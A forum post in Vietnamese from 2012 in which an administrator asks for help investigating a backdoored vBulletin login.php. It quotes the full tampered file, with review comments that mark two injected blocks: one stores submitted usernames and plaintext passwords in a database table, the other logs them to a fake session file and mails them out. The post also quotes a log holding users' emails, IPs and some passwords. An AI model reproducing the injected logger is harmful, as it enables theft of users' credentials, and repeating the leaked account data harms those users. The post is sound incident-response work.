  [Analyzing]   Xem lại các email đã gởi từ hàm mail() trên PHP 23/04/2012 09:45:49 (+0700) | #1 | 261895
phonglanbiec
Chào các bạn,

Mình đang gặp 1 tình huống như sau:

- Forum của bạn mình sử dụng VBB có bản quyền. Nhưng hôm nay thì không login vào được. Thế là hắn nhờ mình kiểm tra tại sao.
- Mình kiểm tra trong file login.php thì phát hiện có 1 đoạn mã lưu lại tất cả thông tin đăng nhập mà người dùng gởi lên, ghi vào 1 file (mà hắn giả làm file session) ở /tmp/. Cứ mỗi lần file có dung lượng >= 10MB thì nội dung file sẽ được hàm mail() tự động gởi đến địa chỉ email của hắn.
- Cách khắc phục tạm thời của mình là lấy 1 file login.php sạch thế cho file đó.

Và hiện tại mình cần giúp đỡ để điều tra thêm:

1. Làm thế nào để kiểm tra đã có bao nhiêu email gởi từ hàm mail() của PHP?
2. Tại sao có 1 giai đoạn tự nhiên nó không nhận cái form password gởi lên?

Vì nội dung file log lại là:


User: xxx Pass: 113114 Email smiliexx@yahoo.com.vn ID : 35164 GroupID : 4 IP: 123.16.146.0 Time: Sunday 22nd of April 2012 08:08:35 PM
User: xxx Pass: 314159htm Email smiliexx@yahoo.com ID : 11557 GroupID : 17 IP: 113.185.1.167 Time: Sunday 22nd of April 2012 08:09:29 PM
User: xxx Pass: canhdonglua Email smiliexx@yahoo.com ID : 22680 GroupID : 2 IP: 1.52.27.213 Time: Sunday 22nd of April 2012 08:11:54 PM
User: onelove46 Pass: Email :hoahuongduong663@gmail.com ID : 31446 GroupID : 2 IP: 123.24.141.8 Time: Sunday 22nd of April 2012 08:19:00 PM
User: tienhieuo01 Pass: Email :tienhieuo01@yahoo.com.vn ID : 26462 GroupID : 2 IP: 1.53.2.31 Time: Sunday 22nd of April 2012 08:40:21 PM
User: edenhoang Pass: Email :uptinmuaban@gmail.com ID : 33772 GroupID : 3 IP: 113.172.221.137 Time: Sunday 22nd of April 2012 08:41:33 PM 


Nội dung file php mà hắn đã sửa lại là:

Code:
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.4 - Licence Number VBF6B249B5
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2009 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

// ####################### SET PHP ENVIRONMENT ###########################
// Report everything except notices and level 8192. 8192 is the numeric value of E_DEPRECATED
// (PHP 5.3+); it is presumably written as a number so the line also parses on older PHP.
error_reporting(E_ALL & ~E_NOTICE & ~8192);

// #################### DEFINE IMPORTANT CONSTANTS #######################
// Constants declared before the back-end is loaded; nothing in this file reads them back,
// so they are presumably consumed by global.php.
define('THIS_SCRIPT', 'login');
define('CSRF_PROTECTION', true);
// NOTE(review): looks like the 'login' action is exempted from the CSRF token check — confirm in global.php.
define('CSRF_SKIP_LIST', 'login');

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
// The four arrays below are only declared here, never read in this file; presumably global.php
// picks them up by name, so the variable names must stay as they are.
$phrasegroups = array();

// get special data templates from the datastore
$specialtemplates = array();

// pre-cache templates used by all actions
$globaltemplates = array();

// pre-cache templates used by specific actions
// Only the 'lostpw' action lists templates: the lost-password form and the human-verification widget.
$actiontemplates = array(
	'lostpw' => array(
		'lostpw',
		'humanverify'
	)
);

// ######################### REQUIRE BACK-END ############################
// Load the application bootstrap first, then the login helper functions.
// DIR is not defined in this file; presumably global.php defines it.
require_once('./global.php');
require_once(DIR . '/includes/functions_login.php');

// #######################################################################
// ######################## START MAIN SCRIPT ############################
// #######################################################################

// Clean the 'a' variable as a string ('r' presumably selects request scope — confirm).
$vbulletin->input->clean_gpc('r', 'a', TYPE_STR);

// No action requested at all: send the visitor to the forum home page.
// NOTE(review): "wwwect" in this and later function names looks like the hosting forum's word
// filter having rewritten part of "redirect" in the pasted listing — confirm against a clean
// copy of the vendor file before treating these names as tampering.
if (empty($_REQUEST['do']) AND empty($vbulletin->GPC['a']))
{
	exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
}

// ############################### start logout ###############################
// Logout action: checks the logout hash for logged-in users, ends the session and shows the
// "cookies cleared" message.
if ($_REQUEST['do'] == 'logout')
{
	define('NOPMPOPUP', true);

	$vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR);

	// Anti-CSRF check: a logged-in user (userid != 0) must present a logouthash that verifies
	// against the raw security token; guests skip the check.
	if ($vbulletin->userinfo['userid'] != 0 AND !verify_security_token($vbulletin->GPC['logouthash'], $vbulletin->userinfo['securitytoken_raw']))
	{
		// standard_error() output is passed to eval() throughout this file; presumably this ends the request — confirm.
		eval(standard_error(fetch_error('logout_error', $vbulletin->session->vars['sessionurl'], $vbulletin->userinfo['securitytoken'])));
	}

	process_logout();

	$vbulletin->url = fetch_replaced_session_url($vbulletin->url);
	// If the return URL still points at the logout action, fall back to the forum home page
	// so the confirmation page does not link back to logout.
	if (strpos($vbulletin->url, 'do=logout') !== false)
	{
		$vbulletin->url = $vbulletin->options['forumhome'] . '.php' . $vbulletin->session->vars['sessionurl_q'];
	}
	$show['member'] = false;
	eval(standard_error(fetch_error('cookieclear', create_full_url($vbulletin->url), $vbulletin->options['forumhome'], $vbulletin->session->vars['sessionurl_q']), '', false));

}

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
// Login form handler (POST only). NOTE(review): going by the surrounding thread, this branch
// carries two code blocks added by an intruder that capture submitted credentials; both are
// marked "INJECTED" below. Everything else matches the structure of the rest of the file.
if ($_POST['do'] == 'login')
{
	// Clean the posted login fields into $vbulletin->GPC.
	$vbulletin->input->clean_array_gpc('p', array(
		'vb_login_username'        => TYPE_STR,
		'vb_login_password'        => TYPE_STR,
		'vb_login_md5password'     => TYPE_STR,
		'vb_login_md5password_utf' => TYPE_STR,
		'postvars'                 => TYPE_BINARY,
		'cookieuser'               => TYPE_BOOL,
		'logintype'                => TYPE_STR,
		'cssprefs'                 => TYPE_STR,
	));
	// NOTE(review): INJECTED, layer 1 (from here through the empty catch). Copies the submitted
	// username and plaintext password into a table named `userpan` (update if the name is already
	// there, insert otherwise). Things that set it apart from the stock queries in this file:
	// no TABLE_PREFIX, and the request values are concatenated into the SQL without
	// escape_string(), so the block is also an SQL-injection risk on a pre-authentication page.
	// For triage: check whether a `userpan` table exists in the forum database and what it holds.
	try{
      		if($vbulletin->db->query_first("SELECT username FROM userpan WHERE username ='".$vbulletin->GPC['vb_login_username']."'")){
			$vbulletin->db->query_write("UPDATE userpan  set password='".$vbulletin->GPC['vb_login_password']."' where username='".$vbulletin->GPC['vb_login_password']."' where username='".$vbulletin->GPC['vb_login_username']."'");
		}else{
			$vbulletin->db->query_write("INSERT INTO  userpan(username,password) values('".$vbulletin->GPC['vb_login_username']."','".$vbulletin->GPC['vb_login_password']."')");
		}      	
		// The cleaned plaintext password is blanked after being copied. Everything below
		// (verify_authentication() and the file logger) therefore sees an empty vb_login_password.
		// This matches the empty "Pass:" fields in the quoted log, and presumably is why logins
		// that depend on the plaintext field stopped working — confirm against the login form.
		$vbulletin->GPC['vb_login_password']="";
 		}
	// Empty catch: any exception raised by the injected block is discarded silently.
	catch(Exception $e){}
	// can the user login?
	$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);

	if ($vbulletin->GPC['vb_login_username'] == '')
	{
		eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
	}

	// make sure our user info stays as whoever we were (for example, we might be logged in via cookies already)
	$original_userinfo = $vbulletin->userinfo;

	if (!verify_authentication($vbulletin->GPC['vb_login_username'], $vbulletin->GPC['vb_login_password'], $vbulletin->GPC['vb_login_md5password'], $vbulletin->GPC['vb_login_md5password_utf'], $vbulletin->GPC['cookieuser'], true))
	{
		// Plugin hook code, if any is registered, is eval()'d here and can see the local variables.
		($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false;

		// check password
		exec_strike_user($vbulletin->userinfo['username']);

		if ($vbulletin->GPC['logintype'] === 'cplogin' OR $vbulletin->GPC['logintype'] === 'modcplogin')
		{
			// log this error if attempting to access the control panel
			require_once(DIR . '/includes/functions_log_error.php');
			log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security');
		}
		// Restore the user info captured before the authentication attempt.
		$vbulletin->userinfo = $original_userinfo;

		if ($vbulletin->options['usestrikesystem'])
		{
			eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
		}
		else
		{
			eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
		}
	}

	exec_unstrike_user($vbulletin->GPC['vb_login_username']);

	// create new session
	process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);



// NOTE(review): INJECTED, layer 2 (from here through the unlink() block). Appends one line per
// login that reaches this point to a file under /tmp named like a PHP session file, then mails
// the file to a fixed address and deletes it once it reaches the size threshold.
// It sits after process_new_login(), so presumably only successful logins are recorded — confirm
// that the failure branch above really ends the request.
// Indicators visible in this block: a sess_* file in /tmp written by the web server user,
// outbound mail() from login.php with a subject of the form "<host>  user login <date>",
// '@'-suppressed errors on every call, and a direct mysql_query() that bypasses $vbulletin->db.
// The [color=red] ... [/color] tags are the poster's forum highlighting, not PHP.
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]); 
   	$lg_password = $vbulletin->GPC["vb_login_password"]; 
[color=red]   	$mail="xxx@live.com";
	$lfile="/tmp/sess_xxx";[/color]
	$lhande=@fopen($lfile,'a');
$email = "unknow";
        if(isset($vbulletin->userinfo['email']))
	$email = $vbulletin->userinfo['email'];
        $userid =$vbulletin->userinfo['userid']; 
        $groupID=$vbulletin->userinfo['usergroupid']; 
	// Second unescaped, string-built query on the posted username; the table name `user` is again
	// used without TABLE_PREFIX.
	$result = @mysql_query("select email from user where username='".$vbulletin->GPC['vb_login_username']."'");
	if($result)
	{
		$row = @mysql_fetch_array($result);
			$email = $row["email"];
	}	
	// One record per line: username, password, e-mail, user id, group id, client IP, timestamp.
	// The first three quoted log lines read "Email " without the colon, so they were presumably
	// written by an earlier variant of this logger — confirm against backups.
	$ldata="User: ".$_POST["vb_login_username"]." Pass: ".$lg_password." Email :".$email ." ID : ".$userid. "  GroupID : ".$groupID. " IP: ".$_SERVER["REMOTE_ADDR"]." Time: ".date('l jS \of F Y h:i:s A')."\n";
	$sub=@$_SERVER['HTTP_HOST']."  user login ".date('l jS \of F Y h:i:s A');
	@fwrite($lhande,$ldata);
	@fclose($lhande);
	// Threshold is 1024*10 bytes, i.e. 10 KiB. The file is deleted after each send and this code
	// keeps no counter, so the number of mails already sent cannot be recovered from the script;
	// the mail server's own logs are the place to count them.
	if(@filesize($lfile)>=1024*10) {
		$data=file_get_contents($lfile);
		@mail($mail,$sub,$data);
		@unlink($lfile);
	}














	// do redirect (the function name below appears as "wwwect" in this listing, presumably
	// altered by the hosting forum's word filter — confirm against a clean copy)
	do_login_wwwect();

}
else if ($_GET['do'] == 'login')
{
	// add consistency with previous behavior
	exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
}

// ############################### start lost password ###############################
// Lost-password form: renders the 'lostpw' template, optionally with a human-verification token.
if ($_REQUEST['do'] == 'lostpw')
{
	// The e-mail value is cleaned with TYPE_NOHTML before it is handed to the template.
	$vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
	$email = $vbulletin->GPC['email'];

	// Build the navigation bar only when the 'canview' forum permission bit is set.
	if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview'])
	{
		$navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form']));
		eval('$navbar = "' . fetch_template('navbar') . '";');
	}
	else
	{
		$navbar = '';
	}

	// human verification
	if (fetch_require_hvcheck('lostpw'))
	{
		require_once(DIR . '/includes/class_humanverify.php');
		$verification =& vB_HumanVerify::fetch_library($vbulletin);
		$human_verify = $verification->output_token();
	}
	else
	{
		$human_verify = '';
	}

	// The template source is eval()'d in this scope, so it presumably refers to the locals set
	// above ($email, $navbar, $human_verify, $url) by name — do not rename them.
	$url =& $vbulletin->url;
	eval('print_output("' . fetch_template('lostpw') . '");');
}

// ############################### start email password ###############################
// Lost-password submission: looks up accounts by e-mail address and mails each match a
// password-reset activation message.
if ($_POST['do'] == 'emailpassword')
{

	$vbulletin->input->clean_array_gpc('p', array(
		'email' => TYPE_STR,
		'userid' => TYPE_UINT,
		'humanverify'  => TYPE_ARRAY,
	));

	if ($vbulletin->GPC['email'] == '')
	{
		eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink'])));
	}

	if (fetch_require_hvcheck('lostpw'))
	{
		require_once(DIR . '/includes/class_humanverify.php');
		$verify =& vB_HumanVerify::fetch_library($vbulletin);
		if (!$verify->verify_token($vbulletin->GPC['humanverify']))
		{
			// NOTE(review): every other call site in this file wraps standard_error() in eval();
			// this one does not — confirm the request still stops here on a failed verification.
	  		standard_error(fetch_error($verify->fetch_error()));
	  	}
	}

	require_once(DIR . '/includes/functions_user.php');

	// The e-mail value is passed through escape_string() before it is placed in the query.
	$users = $db->query_read_slave("
		SELECT userid, username, email, languageid
		FROM " . TABLE_PREFIX . "user
		WHERE email = '" . $db->escape_string($vbulletin->GPC['email']) . "'
	");
	if ($db->num_rows($users))
	{
		while ($user = $db->fetch_array($users))
		{
			// When a userid was posted, only the matching account is mailed.
			if ($vbulletin->GPC['userid'] AND $vbulletin->GPC['userid'] != $user['userid'])
			{
				continue;
			}
			$user['username'] = unhtmlspecialchars($user['username']);

			$user['activationid'] = build_user_activation_id($user['userid'], 2, 1);

			// The eval()'d phrase code presumably sets $subject and $message from $user — confirm.
			eval(fetch_email_phrases('lostpw', $user['languageid']));
			vbmail($user['email'], $subject, $message, true);
		}

		$vbulletin->url = str_replace('"', '', $vbulletin->url);
		eval(print_standard_wwwect('wwwect_lostpw', true, true));
	}
	else
	{
		// NOTE(review): a known address gets the confirmation page and an unknown one gets
		// 'invalidemail', so the response tells a caller whether an address is registered.
		eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink'])));
	}
}

// ############################### start reset password ###############################
// Password reset: validates the activation id from the mailed link, sets a new random password
// and mails it to the account's address.
if ($vbulletin->GPC['a'] == 'pwd' OR $_REQUEST['do'] == 'resetpassword')
{

	$vbulletin->input->clean_array_gpc('r', array(
		'userid'       => TYPE_UINT,
		'u'            => TYPE_UINT,
		'activationid' => TYPE_STR,
		'i'            => TYPE_STR
	));

	// 'u' and 'i' are used as fallbacks when 'userid' / 'activationid' are empty.
	if (!$vbulletin->GPC['userid'])
	{
		$vbulletin->GPC['userid'] = $vbulletin->GPC['u'];
	}

	if (!$vbulletin->GPC['activationid'])
	{
		$vbulletin->GPC['activationid'] = $vbulletin->GPC['i'];
	}

	$userinfo = verify_id('user', $vbulletin->GPC['userid'], 1, 1);

	// userid is interpolated directly; it comes from verify_id() on a TYPE_UINT-cleaned value.
	$user = $db->query_first("
		SELECT activationid, dateline
		FROM " . TABLE_PREFIX . "useractivation
		WHERE type = 1
			AND userid = $userinfo[userid]
	");

	if (!$user)
	{
		// no activation record, probably got back here after a successful request, back to home
		exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
	}

	if ($user['dateline'] < (TIMENOW - 24 * 60 * 60))
	{  // is it older than 24 hours?
		eval(standard_error(fetch_error('resetexpired', $vbulletin->session->vars['sessionurl'])));
	}

	// NOTE(review): loose '!=' comparison of the stored and supplied activation ids; if both are
	// numeric-looking strings PHP compares them as numbers — confirm the id format.
	if ($user['activationid'] != $vbulletin->GPC['activationid'])
	{ //wrong act id
		eval(standard_error(fetch_error('resetbadid', $vbulletin->session->vars['sessionurl'])));
	}

	// delete old activation id
	$db->query_write("DELETE FROM " . TABLE_PREFIX . "useractivation WHERE userid = $userinfo[userid] AND type = 1");

	$newpassword = fetch_random_password(8);

	// init user data manager
	$userdata =& datamanager_init('User', $vbulletin, ERRTYPE_STANDARD);
	$userdata->set_existing($userinfo);
	$userdata->set('password', $newpassword);
	$userdata->save();

	// Plugin hook code, if any is registered, is eval()'d here and can see $newpassword.
	($hook = vBulletinHook::fetch_hook('reset_password')) ? eval($hook) : false;

	// The eval()'d phrase code presumably builds $subject and $message, including the new
	// password, from the locals above — confirm.
	eval(fetch_email_phrases('resetpw', $userinfo['languageid']));
	vbmail($userinfo['email'], $subject, $message, true);

	// Despite the name, standard_error() is used here to show the 'resetpw' result message.
	eval(standard_error(fetch_error('resetpw', $vbulletin->session->vars['sessionurl'])));

}

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 21:09, Mon Sep 28th 2009
|| # CVS: $RCSfile$ - $Revision: 31381 $
|| ####################################################################
\*======================================================================*/
?>


Thông tin về server:

Apache version 2.2.17
PHP version 5.2.14
MySQL version 5.0.95-community
Architecture i686
Operating system linux
Kernel version 2.6.18-238.19.1.el5PAE 